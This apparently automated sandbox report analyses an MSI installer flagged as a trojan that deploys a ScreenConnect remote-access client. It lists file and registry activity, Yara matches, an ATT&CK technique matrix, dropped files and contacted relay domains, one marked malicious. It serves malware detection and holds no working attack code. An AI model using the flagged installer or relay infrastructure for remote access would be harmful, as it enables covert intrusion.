Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_0572E7C8 CreateNamedPipeW,

6_2_0572E7C8

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_01874D2F RtlGetVersion,

6_2_01874D2F

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Modifies security policies related information

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Source: Yara match	File source: 7.2.ScreenConnect.WindowsClient.exe.23ffa10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.ScreenConnect.WindowsClient.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Installer\MSI15E7.tmp, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\4c1433.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	1 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Obfuscated Files or Information	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Windows Service	1 Access Token Manipulation	1 Timestomp	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	2 Windows Service	1 DLL Side-Loading	NTDS	3 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	3 Process Injection	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	22 Masquerading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	3 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	3 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Rundll32	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
INSPECAO-B01S.msi	5%	ReversingLabs	Win32.Trojan.Malgent

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Windows\Installer\MSI1608.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI17AE.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
https://g.live.com/odclientsettings/Prod.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://feedback.screenconnect.com/Feedback.axd	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
server-nix9656e2a4-relay.screenconnect.com	147.75.63.168	true	false		unknown
instance-xkznvd-relay.screenconnect.com	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/V	ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/?	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v	rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	false		unknown
https://docs.rs/getrandom#nodejs-es-module-support	ScreenConnect.WindowsCredentialProvider.dll.1.dr	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/d	ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002397000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002466000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000022C6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000020CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.000000000237D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002178000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002234000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000008.00000002.2942134728.0000017F9328D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.8.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wixtoolset.org/news/	rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	false		unknown
http://www.goodfont.co.kr	ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://instance-xkznvd-relay.screenconnect.com:443/l	ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
